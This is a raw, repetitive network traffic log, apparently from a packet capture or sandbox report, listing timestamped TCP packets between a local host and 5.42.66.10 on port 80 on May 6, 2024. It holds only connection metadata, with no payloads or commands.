May 6, 2024 07:53:08.446007013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446021080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446050882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446150064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446166992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446178913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446191072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446221113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446331024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446372032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446479082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446495056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446506023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446517944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446527958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446531057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446541071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446547985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446553946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446566105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446582079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446582079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446609020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446738958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446751118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446760893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446774006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446780920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446787119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446808100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446829081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446832895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446840048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446851969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446863890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.446870089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446897030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.446918964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447098970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447109938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447123051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447134972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447144985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447159052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447169065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447189093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447212934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447256088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447268009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447280884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447293043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447295904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447309971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447325945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447325945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447359085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447444916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447458029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447472095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447483063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447489023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447495937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447515011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447515011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447547913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447626114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447637081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447648048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447659016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447664976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447670937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447679996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447683096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447700024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447710037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447712898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447726011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447727919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447757006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447757959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447777987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447803974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.447956085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447967052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447978020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447989941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.447999954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448004961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448013067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448018074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448025942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448036909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448045969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448050022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448061943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448081970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448092937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448112011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448120117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448122978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448133945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448134899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448148012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448162079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448163033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448199987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448245049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448256969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448271990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448273897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448280096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448302984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448321104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448450089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448462009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448472977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448484898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448493958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448497057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448501110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448508978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448519945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448524952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448533058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448544979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448551893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448556900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448566914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448584080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448587894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448597908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448607922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448610067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448621035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448627949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448632956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448652029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448668957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448757887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448770046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448781013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448792934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448800087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448813915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448826075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.448971987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448982954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.448993921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449007988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449012995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449019909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449032068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449038982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449043989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449054956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449067116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449084997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449100971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449104071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449114084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449124098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449141026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449170113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449294090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449305058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449316025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449327946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449337959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449338913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449351072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449352980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449366093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449382067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449403048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449433088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449450970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449462891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449474096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449475050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449486971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449498892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449501991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449511051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449526072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449538946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449553013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449564934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449567080 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449589014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449603081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449754953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449767113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449783087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449793100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449801922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449806929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449825048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449841022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449939966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449955940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449968100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449976921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.449980974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.449992895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450001001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450005054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450012922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450017929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450031996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450043917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450046062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450057983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450083971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450086117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450119019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450119019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450130939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450141907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450155020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450156927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450156927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450166941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450182915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450200081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450212002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450315952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450326920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450339079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450351000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450352907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450364113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450371981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450376034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450385094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450387955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450400114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450411081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450411081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450436115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450438976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450448990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450460911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450485945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450640917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450653076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450664043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450680971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450681925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450694084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450705051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450710058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450716972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450728893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450757980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450798988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450817108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450829029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450841904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450854063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450856924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450866938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450884104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450908899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.450939894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450953007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.450978994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451001883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451133013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451143026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451153040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451165915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451174974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451190948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451220036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451318979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451330900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451342106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451353073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451364040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451365948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451384068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451409101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451504946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451515913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451527119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451536894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451548100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451550007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451562881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451574087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451576948 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451606989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451618910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451632023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451644897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451656103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451674938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451683044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451704979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451839924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451853037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451863050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451874971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451883078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451886892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451898098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451898098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451910019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451921940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.451927900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451946974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451966047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.451996088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452008009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452019930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452032089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452035904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452044010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452053070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452070951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452095032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452167034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452178001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452191114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452204943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452204943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452214003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452215910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452229023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452235937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452259064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452281952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452349901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452361107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452373981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452385902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452388048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452399015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452409029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452440977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452469110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452528000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452538967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452548981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452562094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452569962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.452574015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.452585936 CEST	80	49741	5.42.66.10	192.168.2.4
